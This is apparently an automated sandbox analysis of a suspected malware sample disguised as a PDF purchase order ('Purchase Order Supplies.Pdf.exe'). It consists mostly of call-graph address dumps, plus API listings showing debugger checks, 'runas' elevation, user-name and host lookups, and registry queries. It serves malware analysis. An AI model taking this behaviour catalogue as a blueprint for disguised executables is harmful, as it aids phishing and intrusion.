110219->110170 110220->110170 110221->110170 110222->110141 110223 d01edb 110228 c9131c 110223->110228 110229 c9133e 110228->110229 110262 c91624 110229->110262 110234 c9d3d2 48 API calls 110235 c9137e 110234->110235 110236 c9d3d2 48 API calls 110235->110236 110237 c91388 110236->110237 110238 c9d3d2 48 API calls 110237->110238 110239 c91392 110238->110239 110240 c9d3d2 48 API calls 110239->110240 110241 c913d8 110240->110241 110242 c9d3d2 48 API calls 110241->110242 110243 c914bb 110242->110243 110270 c91673 110243->110270 110308 c917e0 110262->110308 110265 c97e53 48 API calls 110266 c91344 110265->110266 110267 c916db 110266->110267 110322 c91867 6 API calls 110267->110322 110269 c91374 110269->110234 110271 c9d3d2 48 API calls 110270->110271 110272 c91683 110271->110272 110273 c9d3d2 48 API calls 110272->110273 110274 c9168b 110273->110274 110323 c97d70 110274->110323 110315 c917fc 110308->110315 110311 c917fc 48 API calls 110312 c917f0 110311->110312 110313 c9d3d2 48 API calls 110312->110313 110314 c9165b 110313->110314 110314->110265 110316 c9d3d2 48 API calls 110315->110316 110317 c91807 110316->110317 110318 c9d3d2 48 API calls 110317->110318 110319 c9180f 110318->110319 110320 c9d3d2 48 API calls 110319->110320 110321 c917e8 110320->110321 110321->110311 110322->110269 110324 c9d3d2 48 API calls 110323->110324 110325 c97d79 110324->110325 110326 c9d3d2 48 API calls 110325->110326 110330 cb6a80 110331 cb6a8c _flsall 110330->110331 110367 cb8b7b GetStartupInfoW 110331->110367 110333 cb6a91 110369 cba937 GetProcessHeap 110333->110369 110335 cb6ae9 110336 cb6af4 110335->110336 110454 cb6bd0 47 API calls 3 library calls 110335->110454 110370 cb87d7 110336->110370 110339 cb6afa 110340 cb6b05 __RTC_Initialize 110339->110340 110455 cb6bd0 47 API calls 3 library calls 110339->110455 110391 cbba66 110340->110391 110343 cb6b14 110344 cb6b20 GetCommandLineW 110343->110344 110456 cb6bd0 47 API calls 3 library calls 110343->110456 110410 cc3c2d GetEnvironmentStringsW 110344->110410 110347 cb6b1f 110347->110344 110351 cb6b45 110423 cc3a64 110351->110423 110354 cb6b4b 110355 cb6b56 110354->110355 110458 cb1d7b 47 API calls 3 library calls 110354->110458 110437 cb1db5 110355->110437 110368 cb8b91 110367->110368 110368->110333 110369->110335 110462 cb1e5a 30 API calls 2 library calls 110370->110462 110372 cb87dc 110463 cb8ab3 InitializeCriticalSectionAndSpinCount 110372->110463 110374 cb87e1 110375 cb87e5 110374->110375 110465 cb8afd TlsAlloc 110374->110465 110464 cb884d 50 API calls 2 library calls 110375->110464 110378 cb87ea 110378->110339 110379 cb87f7 110379->110375 110380 cb8802 110379->110380 110466 cb7616 110380->110466 110383 cb8844 110474 cb884d 50 API calls 2 library calls 110383->110474 110386 cb8823 110386->110383 110388 cb8829 110386->110388 110387 cb8849 110387->110339 110473 cb8724 47 API calls 4 library calls 110388->110473 110390 cb8831 GetCurrentThreadId 110390->110339 110392 cbba72 _flsall 110391->110392 110483 cb8984 110392->110483 110394 cbba79 110395 cb7616 __calloc_crt 47 API calls 110394->110395 110396 cbba8a 110395->110396 110397 cbba95 _flsall @_EH4_CallFilterFunc@8 110396->110397 110398 cbbaf5 GetStartupInfoW 110396->110398 110397->110343 110404 cbbb0a 110398->110404 110406 cbbc33 110398->110406 110399 cbbcf7 110490 cbbd0b RtlLeaveCriticalSection _doexit 110399->110490 110401 cbbc7c GetStdHandle 110401->110406 110402 cb7616 __calloc_crt 47 API calls 110402->110404 110403 cbbc8e GetFileType 110403->110406 110404->110402 110405 cbbb58 110404->110405 110404->110406 110405->110406 110408 cbbb8a GetFileType 110405->110408 110409 cbbb98 InitializeCriticalSectionAndSpinCount 110405->110409 110406->110399 110406->110401 110406->110403 110407 cbbcbb InitializeCriticalSectionAndSpinCount 110406->110407 110407->110406 110408->110405 110408->110409 110409->110405 110411 cc3c3e 110410->110411 110412 cb6b30 110410->110412 110529 cb7660 47 API calls _W_store_winword 110411->110529 110417 cc382b GetModuleFileNameW 110412->110417 110415 cc3c7a FreeEnvironmentStringsW 110415->110412 110416 cc3c64 _memmove 110416->110415 110418 cc385f _wparse_cmdline 110417->110418 110419 cb6b3a 110418->110419 110420 cc3899 110418->110420 110419->110351 110457 cb1d7b 47 API calls 3 library calls 110419->110457 110530 cb7660 47 API calls _W_store_winword 110420->110530 110422 cc389f _wparse_cmdline 110422->110419 110424 cc3a7d __wsetenvp 110423->110424 110428 cc3a75 110423->110428 110425 cb7616 __calloc_crt 47 API calls 110424->110425 110434 cc3aa6 __wsetenvp 110425->110434 110426 cc3afd 110428->110354 110429 cb7616 __calloc_crt 47 API calls 110429->110434 110430 cc3b22 110433 cc3b39 110434->110426 110434->110428 110434->110429 110434->110430 110434->110433 110531 cc3317 47 API calls 2 library calls 110434->110531 110454->110336 110455->110340 110456->110347 110462->110372 110463->110374 110464->110378 110465->110379 110469 cb761d 110466->110469 110468 cb765a 110468->110383 110472 cb8b59 TlsSetValue 110468->110472 110469->110468 110470 cb763b Sleep 110469->110470 110475 cc3e5a 110469->110475 110471 cb7652 110470->110471 110471->110468 110471->110469 110472->110386 110473->110390 110474->110387 110476 cc3e65 110475->110476 110481 cc3e80 __calloc_impl 110475->110481 110477 cc3e71 110476->110477 110476->110481 110482 cb889e 47 API calls __getptd_noexit 110477->110482 110479 cc3e90 RtlAllocateHeap 110480 cc3e76 110479->110480 110479->110481 110480->110469 110481->110479 110481->110480 110482->110480 110484 cb89a8 RtlEnterCriticalSection 110483->110484 110485 cb8995 110483->110485 110484->110394 110491 cb8a0c 110485->110491 110487 cb899b 110487->110484 110515 cb1d7b 47 API calls 3 library calls 110487->110515 110490->110397 110492 cb8a18 _flsall 110491->110492 110493 cb8a39 110492->110493 110494 cb8a21 110492->110494 110496 cb8a37 110493->110496 110502 cb8aa1 _flsall 110493->110502 110516 cb8e52 47 API calls 2 library calls 110494->110516 110496->110493 110519 cb7660 47 API calls _W_store_winword 110496->110519 110497 cb8a26 110517 cb8eb2 47 API calls 8 library calls 110497->110517 110500 cb8a4d 110503 cb8a63 110500->110503 110504 cb8a54 110500->110504 110501 cb8a2d 110518 cb1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110501->110518 110502->110487 110507 cb8984 __lock 46 API calls 110503->110507 110520 cb889e 47 API calls __getptd_noexit 110504->110520 110509 cb8a6a 110507->110509 110508 cb8a59 110508->110502 110510 cb8a79 InitializeCriticalSectionAndSpinCount 110509->110510 110511 cb8a8e 110509->110511 110512 cb8a94 110510->110512 110521 cb28ca 110511->110521 110527 cb8aaa RtlLeaveCriticalSection _doexit 110512->110527 110516->110497 110517->110501 110519->110500 110520->110508 110522 cb28d3 RtlFreeHeap 110521->110522 110526 cb28fc __dosmaperr 110521->110526 110523 cb28e8 110522->110523 110522->110526 110528 cb889e 47 API calls __getptd_noexit 110523->110528 110525 cb28ee GetLastError 110525->110526 110526->110512 110527->110502 110528->110525 110529->110416 110530->110422 110531->110434 111318 d0c05b 111319 d0c05d 111318->111319 111322 cd78ee WSAStartup 111319->111322 111321 d0c066 111323 cd7917 gethostname gethostbyname 111322->111323 111324 cd79b1 _wcscpy 111322->111324 111323->111324 111325 cd793a _memmove 111323->111325 111324->111321 111326 cd7970 inet_ntoa 111325->111326 111330 cd7952 _wcscpy 111325->111330 111328 cd7989 _strcat 111326->111328 111327 cd79a9 WSACleanup 111327->111324 111331 cd8553 111328->111331 111330->111327 111333 cd8565 _strlen 111331->111333 111334 cd8561 111331->111334 111332 cd8574 MultiByteToWideChar 111332->111334 111335 cd858a 111332->111335 111333->111332 111334->111330 111336 cb010a 48 API calls 111335->111336 111337 cd85a6 MultiByteToWideChar 111336->111337 111337->111334 111338 c929c2 111339 c929cb 111338->111339 111340 c929e9 111339->111340 111341 c92a48 111339->111341 111379 c92a46 111339->111379 111345 c92aac PostQuitMessage 111340->111345 111346 c929f6 111340->111346 111343 d02307 111341->111343 111344 c92a4e 111341->111344 111342 c92a2b NtdllDefWindowProc_W 111369 c92a39 111342->111369 111393 c9322e 16 API calls 111343->111393 111347 c92a53 111344->111347 111348 c92a76 SetTimer RegisterClipboardFormatW 111344->111348 111345->111369 111350 c92a01 111346->111350 111351 d0238f 111346->111351 111356 c92a5a KillTimer 111347->111356 111357 d022aa 111347->111357 111352 c92a9f CreatePopupMenu 111348->111352 111348->111369 111353 c92a09 111350->111353 111354 c92ab6 111350->111354 111399 cd57fb 60 API calls _memset 111351->111399 111352->111369 111360 d02374 111353->111360 111361 c92a14 111353->111361 111383 c91e58 111354->111383 111390 c92b94 Shell_NotifyIconW _memset 111356->111390 111364 d022e3 MoveWindow 111357->111364 111365 d022af 111357->111365 111358 d0232e 111394 caec33 407 API calls Mailbox 111358->111394 111360->111342 111398 ccb31f 48 API calls 111360->111398 111367 c92a1f 111361->111367 111368 d0235f 111361->111368 111362 d023a1 111362->111342 111362->111369 111364->111369 111370 d022d2 SetFocus 111365->111370 111371 d022b3 111365->111371 111367->111342 111395 c92b94 Shell_NotifyIconW _memset 111367->111395 111397 cd5fdb 70 API calls _memset 111368->111397 111370->111369 111371->111367 111373 d022bc 111371->111373 111372 c92a6d 111391 c92ac7 DeleteObject DestroyWindow Mailbox 111372->111391 111392 c9322e 16 API calls 111373->111392 111378 d0236f 111378->111369 111379->111342 111381 d02353 111396 c93598 67 API calls _memset 111381->111396 111384 c91e6f _memset 111383->111384 111385 c91ef1 111383->111385 111400 c938e4 111384->111400 111385->111369 111387 c91eda KillTimer SetTimer 111387->111385 111388 c91e96 111388->111387 111389 d04518 Shell_NotifyIconW 111388->111389 111389->111387 111390->111372 111391->111369 111392->111369 111393->111358 111394->111367 111395->111381 111396->111379 111397->111378 111398->111379 111399->111362 111401 c93900 111400->111401 111421 c939d5 Mailbox 111400->111421 111402 c97b6e 48 API calls 111401->111402 111403 c9390e 111402->111403 111404 c9391b 111403->111404 111405 d0453f LoadStringW 111403->111405 111406 c97e53 48 API calls 111404->111406 111407 d04559 111405->111407 111408 c93930 111406->111408 111423 c939e8 48 API calls 2 library calls 111407->111423 111408->111407 111410 c93941 111408->111410 111411 c9394b 111410->111411 111412 c939da 111410->111412 111422 c939e8 48 API calls 2 library calls 111411->111422 111415 c9c935 48 API calls 111412->111415 111413 d04564 111416 d04578 111413->111416 111418 c93956 _memset _wcscpy 111413->111418 111415->111418 111424 c939e8 48 API calls 2 library calls 111416->111424 111420 c939ba Shell_NotifyIconW 111418->111420 111419 d04586 111420->111421 111421->111388 111422->111418 111423->111413 111424->111419 111425 d04ddc 111426 d04de6 VariantClear 111425->111426 111427 ca4472 111425->111427 111426->111427 111428 ca1118 111493 cae016 111428->111493 111430 ca112e 111431 ca1148 111430->111431 111432 d0abeb 111430->111432 111434 ca3680 407 API calls 111431->111434 111507 cacf79 49 API calls 111432->111507 111474 c9fad8 Mailbox _memmove 111434->111474 111436 d0ac2a 111439 d0ac4a Mailbox 111436->111439 111508 cdba5d 48 API calls 111436->111508 111437 d0b628 Mailbox 111511 cdd520 86 API calls 4 library calls 111439->111511 111440 ca105e 111450 c9c935 48 API calls 111440->111450 111441 ca0119 111514 cdd520 86 API calls 4 library calls 111441->111514 111444 ca1063 111513 cdd520 86 API calls 4 library calls 111444->111513 111446 ca0dee 111447 c9d89e 50 API calls 111446->111447 111449 ca0dfa 111447->111449 111448 d0b772 111515 cdd520 86 API calls 4 library calls 111448->111515 111451 c9d89e 50 API calls 111449->111451 111466 c9fbf1 Mailbox 111450->111466 111455 ca0e83 111451->111455 111453 c9f6d0 407 API calls 111453->111474 111454 c9c935 48 API calls 111454->111474 111460 c9caee 48 API calls 111455->111460 111456 c9d3d2 48 API calls 111456->111474 111458 d0b7d2 111459 cca599 InterlockedDecrement 111459->111474 111473 ca10f1 Mailbox 111460->111473 111461 cb1b2a 52 API calls __cinit 111461->111474 111464 ca1230 111464->111466 111512 cdd520 86 API calls 4 library calls 111464->111512 111467 cb010a 48 API calls 111467->111474 111468 c9fa40 407 API calls 111468->111474 111471 d0b583 111509 cdd520 86 API calls 4 library calls 111471->111509 111510 cdd520 86 API calls 4 library calls 111473->111510 111474->111440 111474->111441 111474->111444 111474->111446 111474->111448 111474->111449 111474->111453 111474->111454 111474->111455 111474->111456 111474->111459 111474->111461 111474->111464 111474->111466 111474->111467 111474->111468 111474->111471 111474->111473 111475 cf804e 113 API calls 111474->111475 111476 cf30ad 93 API calls 111474->111476 111477 cf798d 109 API calls 111474->111477 111478 ceb74b 407 API calls 111474->111478 111479 cf17aa 87 API calls 111474->111479 111480 caef0d 94 API calls 111474->111480 111481 cf10e5 82 API calls 111474->111481 111482 c950a3 49 API calls 111474->111482 111483 caf461 98 API calls 111474->111483 111484 ce8065 55 API calls 111474->111484 111485 ce9122 91 API calls 111474->111485 111486 cadd84 3 API calls 111474->111486 111487 ce92c0 88 API calls 111474->111487 111488 c981c6 85 API calls 111474->111488 111489 ce013f 87 API calls 111474->111489 111490 caf03e 2 API calls 111474->111490 111491 cf0bfa 129 API calls 111474->111491 111492 cf1f19 132 API calls 111474->111492 111502 ca1620 59 API calls Mailbox 111474->111502 111503 ceee52 82 API calls 2 library calls 111474->111503 111504 ceef9d 90 API calls Mailbox 111474->111504 111505 cdb020 48 API calls 111474->111505 111506 cee713 407 API calls Mailbox 111474->111506 111475->111474 111476->111474 111477->111474 111478->111474 111479->111474 111480->111474 111481->111474 111482->111474 111483->111474 111484->111474 111485->111474 111486->111474 111487->111474 111488->111474 111489->111474 111490->111474 111491->111474 111492->111474 111494 cae022 111493->111494 111495 cae034 111493->111495 111496 c9d89e 50 API calls 111494->111496 111497 cae03a 111495->111497 111498 cae063 111495->111498 111501 cae02c 111496->111501 111500 cb010a 48 API calls 111497->111500 111499 c9d89e 50 API calls 111498->111499 111499->111501 111500->111501 111501->111430 111502->111474 111503->111474 111504->111474 111505->111474 111506->111474 111507->111436 111508->111439 111509->111473 111510->111466 111511->111437 111512->111444 111513->111441 111514->111448 111515->111458 111516 ca13d9 111517 cb010a 48 API calls 111516->111517 111518 ca13e0 111517->111518 111519 d0bc25 111520 d0bc27 111519->111520 111523 cd79f8 SHGetFolderPathW 111520->111523 111522 d0bc30 111522->111522 111524 c97e53 48 API calls 111523->111524 111525 cd7a25 111524->111525 111525->111522 111526 d0c146 GetUserNameW 111527 d01eca 111532 cabe17 111527->111532 111531 d01ed9 111533 c9d3d2 48 API calls 111532->111533 111534 cabe85 111533->111534 111541 cac929 111534->111541 111536 d0db92 111538 cabf22 111538->111536 111539 cabf3e 111538->111539 111544 cac8b7 48 API calls _memmove 111538->111544 111540 cb1b2a 52 API calls __cinit 111539->111540 111540->111531 111545 cac955 111541->111545 111544->111538 111546 cac962 111545->111546 111548 cac948 111545->111548 111547 cac969 RegOpenKeyExW 111546->111547 111546->111548 111547->111548 111549 cac983 RegQueryValueExW 111547->111549 111548->111538 111550 cac9b9 RegCloseKey 111549->111550 111551 cac9a4 111549->111551 111550->111548 111551->111550 111552 d01e8b 111557 cae44f 111552->111557 111556 d01e9a 111558 cb010a 48 API calls 111557->111558 111559 cae457 111558->111559 111560 cae46b 111559->111560 111565 cae74b 111559->111565 111564 cb1b2a 52 API calls __cinit 111560->111564 111564->111556 111566 cae463 111565->111566 111567 cae754 111565->111567 111569 cae47b 111566->111569 111597 cb1b2a 52 API calls __cinit 111567->111597 111570 c9d3d2 48 API calls 111569->111570 111571 cae492 GetVersionExW 111570->111571 111572 c97e53 48 API calls 111571->111572 111573 cae4d5 111572->111573 111598 cae5f8 111573->111598 111576 cae617 48 API calls 111577 cae4e9 111576->111577 111579 d029f9 111577->111579 111602 cae6d1 111577->111602 111581 cae55f GetCurrentProcess 111611 cae70e LoadLibraryA GetProcAddress 111581->111611 111583 cae59e 111605 cae694 111583->111605 111584 cae5ec GetSystemInfo 111586 cae5c9 111584->111586 111585 cae576 111585->111583 111585->111584 111588 cae5dc 111586->111588 111589 cae5d7 FreeLibrary 111586->111589 111588->111560 111589->111588 111591 cae5e4 GetSystemInfo 111593 cae5be 111591->111593 111592 cae5b4 111608 cae437 111592->111608 111593->111586 111596 cae5c4 FreeLibrary 111593->111596 111596->111586 111597->111566 111599 cae601 111598->111599 111600 c9a2fb 48 API calls 111599->111600 111601 cae4dd 111600->111601 111601->111576 111612 cae6e3 111602->111612 111616 cae6a6 111605->111616 111609 cae694 2 API calls 111608->111609 111610 cae43f GetNativeSystemInfo 111609->111610 111610->111593 111611->111585 111613 cae55b 111612->111613 111614 cae6ec LoadLibraryA 111612->111614 111613->111581 111613->111585 111614->111613 111615 cae6fd GetProcAddress 111614->111615 111615->111613 111617 cae5ac 111616->111617 111618 cae6af LoadLibraryA 111616->111618 111617->111591 111617->111592 111618->111617 111619 cae6c0 GetProcAddress 111618->111619 111619->111617 111620 d01eed 111625 cae975 111620->111625 111622 d01f01 111641 cb1b2a 52 API calls __cinit 111622->111641 111624 d01f0b 111626 cb010a 48 API calls 111625->111626 111627 caea27 GetModuleFileNameW 111626->111627 111628 cb297d __wsplitpath 47 API calls 111627->111628 111629 caea5b _wcsncat 111628->111629 111642 cb2bff 111629->111642 111632 cb010a 48 API calls 111633 caea94 _wcscpy 111632->111633 111634 c9d3d2 48 API calls 111633->111634 111635 caeacf 111634->111635 111645 caeb05 111635->111645 111637 caeae0 Mailbox 111637->111622 111638 cb010a 48 API calls 111639 caeada _wcscat __wsetenvp _wcsncpy 111638->111639 111639->111637 111639->111638 111640 c9a4f6 48 API calls 111639->111640 111640->111639 111641->111624 111659 cbaab9 111642->111659 111646 c9c4cd 48 API calls 111645->111646 111647 caeb14 RegOpenKeyExW 111646->111647 111648 d04b17 RegQueryValueExW 111647->111648 111649 caeb35 111647->111649 111650 d04b30 111648->111650 111651 d04b91 RegCloseKey 111648->111651 111649->111639 111652 cb010a 48 API calls 111650->111652 111653 d04b49 111652->111653 111654 c94bce 48 API calls 111653->111654 111655 d04b53 RegQueryValueExW 111654->111655 111656 d04b86 111655->111656 111657 d04b6f 111655->111657 111656->111651 111658 c97e53 48 API calls 111657->111658 111658->111656 111660 cbaaca 111659->111660 111661 cbabc6 111659->111661 111660->111661 111662 cbaad5 111660->111662 111669 cb889e 47 API calls __getptd_noexit 111661->111669 111666 caea8a 111662->111666 111668 cb889e 47 API calls __getptd_noexit 111662->111668 111666->111632 111667 cbabbb 111670 cb7aa0 8 API calls __Wcsftime_l 111667->111670 111668->111667 111669->111667 111670->111666 111671 c9e834 111672 ca2b40 407 API calls 111671->111672 111673 c9e840 111672->111673 111674 ca0ff7 111675 cae016 50 API calls 111674->111675 111676 ca100d 111675->111676 111731 cae08f 111676->111731 111680 cb010a 48 API calls 111712 c9fad8 Mailbox _memmove 111680->111712 111681 ca105e 111691 c9c935 48 API calls 111681->111691 111683 ca1063 111751 cdd520 86 API calls 4 library calls 111683->111751 111684 c9c935 48 API calls 111684->111712 111686 ca0dee 111687 c9d89e 50 API calls 111686->111687 111690 ca0dfa 111687->111690 111688 d0b772 111753 cdd520 86 API calls 4 library calls 111688->111753 111689 ca0119 111752 cdd520 86 API calls 4 library calls 111689->111752 111692 c9d89e 50 API calls 111690->111692 111705 c9fbf1 Mailbox 111691->111705 111695 ca0e83 111692->111695 111693 c9f6d0 407 API calls 111693->111712 111694 c9d3d2 48 API calls 111694->111712 111700 c9caee 48 API calls 111695->111700 111696 cca599 InterlockedDecrement 111696->111712 111698 cb1b2a 52 API calls __cinit 111698->111712 111699 d0b7d2 111711 ca10f1 Mailbox 111700->111711 111703 ca103d 111703->111705 111750 cdd520 86 API calls 4 library calls 111703->111750 111706 c9fa40 407 API calls 111706->111712 111709 d0b583 111748 cdd520 86 API calls 4 library calls 111709->111748 111749 cdd520 86 API calls 4 library calls 111711->111749 111712->111680 111712->111681 111712->111683 111712->111684 111712->111686 111712->111688 111712->111689 111712->111690 111712->111693 111712->111694 111712->111695 111712->111696 111712->111698 111712->111703 111712->111705 111712->111706 111712->111709 111712->111711 111713 cf804e 113 API calls 111712->111713 111714 cf30ad 93 API calls 111712->111714 111715 cf798d 109 API calls 111712->111715 111716 ceb74b 407 API calls 111712->111716 111717 cf17aa 87 API calls 111712->111717 111718 caef0d 94 API calls 111712->111718 111719 cf10e5 82 API calls 111712->111719 111720 c950a3 49 API calls 111712->111720 111721 caf461 98 API calls 111712->111721 111722 ce8065 55 API calls 111712->111722 111723 ce9122 91 API calls 111712->111723 111724 cadd84 3 API calls 111712->111724 111725 ce92c0 88 API calls 111712->111725 111726 c981c6 85 API calls 111712->111726 111727 ce013f 87 API calls 111712->111727 111728 caf03e 2 API calls 111712->111728 111729 cf0bfa 129 API calls 111712->111729 111730 cf1f19 132 API calls 111712->111730 111743 ca1620 59 API calls Mailbox 111712->111743 111744 ceee52 82 API calls 2 library calls 111712->111744 111745 ceef9d 90 API calls Mailbox 111712->111745 111746 cdb020 48 API calls 111712->111746 111747 cee713 407 API calls Mailbox 111712->111747 111713->111712 111714->111712 111715->111712 111716->111712 111717->111712 111718->111712 111719->111712 111720->111712 111721->111712 111722->111712 111723->111712 111724->111712 111725->111712 111726->111712 111727->111712 111728->111712 111729->111712 111730->111712 111732 c97b6e 48 API calls 111731->111732 111733 cae0b4 _wcscmp 111732->111733 111734 c9caee 48 API calls 111733->111734 111735 cae0e2 Mailbox 111733->111735 111736 d0b9c7 111734->111736 111735->111712 111754 c97b4b 48 API calls Mailbox 111736->111754 111738 d0b9d5 111739 c9d2d2 53 API calls 111738->111739 111740 d0b9e7 111739->111740 111741 c9d89e 50 API calls 111740->111741 111742 d0b9ec Mailbox 111740->111742 111741->111742 111742->111712 111743->111712 111744->111712 111745->111712 111746->111712 111747->111712 111748->111711 111749->111705 111750->111683 111751->111689 111752->111688 111753->111699 111754->111738

                          Executed Functions

                          Function 00C9374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C9376D
                            • Part of subcall function 00C94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00000000,00000001,00000000), ref: 00C9428C
                          • IsDebuggerPresent.KERNEL32(?,?), ref: 00C9377F
                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00D51120,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00D51124,?,?), ref: 00C937EE
                            • Part of subcall function 00C934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00C9352A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C93860
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00D42934,00000010), ref: 00D021C5
                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00D021FD
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00D02232
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D2DAA4), ref: 00D02290
                          • ShellExecuteW.SHELL32(00000000), ref: 00D02297
                            • Part of subcall function 00C930A5: GetSysColorBrush.USER32(0000000F), ref: 00C930B0
                            • Part of subcall function 00C930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00C930BF
                            • Part of subcall function 00C930A5: LoadIconW.USER32(00000063), ref: 00C930D5
                            • Part of subcall function 00C930A5: LoadIconW.USER32(000000A4), ref: 00C930E7
                            • Part of subcall function 00C930A5: LoadIconW.USER32(000000A2), ref: 00C930F9
                            • Part of subcall function 00C930A5: RegisterClassExW.USER32(?), ref: 00C93167
                            • Part of subcall function 00C92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C92ECB
                            • Part of subcall function 00C92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C92EEC
                            • Part of subcall function 00C92E9D: ShowWindow.USER32(00000000), ref: 00C92F00
                            • Part of subcall function 00C92E9D: ShowWindow.USER32(00000000), ref: 00C92F09
                            • Part of subcall function 00C93598: _memset.LIBCMT ref: 00C935BE
                            • Part of subcall function 00C93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C93667
                          Strings
                          • runas, xrefs: 00D0228B
                          • C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, xrefs: 00C937B4, 00C937E9, 00C937FD, 00D02257
                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00D021BE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 4253510256-517146631
                          • Opcode ID: 7333da013f0863c16ae40b28c087e23a26d27fda512056de7aa680fd4edef7b6
                          • Instruction ID: b082c0ccad3764da5efc34dbd1f2a5e68294febb400a6a11d45c38db966b3c6d
                          • Opcode Fuzzy Hash: 7333da013f0863c16ae40b28c087e23a26d27fda512056de7aa680fd4edef7b6
                          • Instruction Fuzzy Hash: BD51F278644384BFCF10ABA09C4EFBD3B699B15715F000096FA51D22D1CB608A49DB36
                          Function 00CF30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1168 cf30ad-cf315b call c9ca8e call c9d3d2 * 3 call c984a6 call cf3d7b call cf3af7 1183 cf315d-cf3161 1168->1183 1184 cf3166-cf3170 1168->1184 1185 cf31e6-cf31f2 call cdd7e4 1183->1185 1186 cf31a2 1184->1186 1187 cf3172-cf3187 RegConnectRegistryW 1184->1187 1196 cf3504-cf3527 call c95cd3 * 3 1185->1196 1191 cf31a6-cf31c3 RegOpenKeyExW 1186->1191 1189 cf319c-cf31a0 1187->1189 1190 cf3189-cf319a call c97ba9 1187->1190 1189->1191 1190->1185 1194 cf31f7-cf3227 call c984a6 RegQueryValueExW 1191->1194 1195 cf31c5-cf31d7 call c97ba9 1191->1195 1203 cf323e-cf3254 call c97ba9 1194->1203 1204 cf3229-cf3239 call c97ba9 1194->1204 1206 cf31d9-cf31dd RegCloseKey 1195->1206 1207 cf31e3-cf31e4 1195->1207 1215 cf34dc-cf34dd 1203->1215 1216 cf325a-cf325f 1203->1216 1214 cf34df-cf34e6 call cdd7e4 1204->1214 1206->1207 1207->1185 1223 cf34eb-cf34fc RegCloseKey 1214->1223 1215->1214 1220 cf344c-cf3498 call cb010a call c984a6 RegQueryValueExW 1216->1220 1221 cf3265-cf3268 1216->1221 1244 cf349a-cf34a6 1220->1244 1245 cf34b4-cf34ce call c97ba9 call cdd7e4 1220->1245 1224 cf326e-cf3273 1221->1224 1225 cf33d9-cf3411 call cdad14 call c984a6 RegQueryValueExW 1221->1225 1223->1196 1227 cf34fe-cf3502 RegCloseKey 1223->1227 1229 cf338d-cf33d4 call c984a6 RegQueryValueExW call ca2570 1224->1229 1230 cf3279-cf327c 1224->1230 1225->1223 1251 cf3417-cf3447 call c97ba9 call cdd7e4 call ca2570 1225->1251 1227->1196 1229->1223 1231 cf32de-cf332b call cb010a call c984a6 RegQueryValueExW 1230->1231 1232 cf327e-cf3281 1230->1232 1231->1245 1261 cf3331-cf3348 1231->1261 1232->1215 1236 cf3287-cf32d9 call c984a6 RegQueryValueExW call ca2570 1232->1236 1236->1223 1250 cf34aa-cf34b2 call c9ca8e 1244->1250 1264 cf34d3-cf34da call cb017e 1245->1264 1250->1264 1251->1223 1261->1250 1265 cf334e-cf3355 1261->1265 1264->1223 1268 cf335c-cf3361 1265->1268 1269 cf3357-cf3358 1265->1269 1272 cf3376-cf337b 1268->1272 1273 cf3363-cf3367 1268->1273 1269->1268 1272->1250 1276 cf3381-cf3388 1272->1276 1274 cf3369-cf336d 1273->1274 1275 cf3371-cf3374 1273->1275 1274->1275 1275->1272 1275->1273 1276->1250
                          APIs
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF317F
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00CF321E
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF32B6
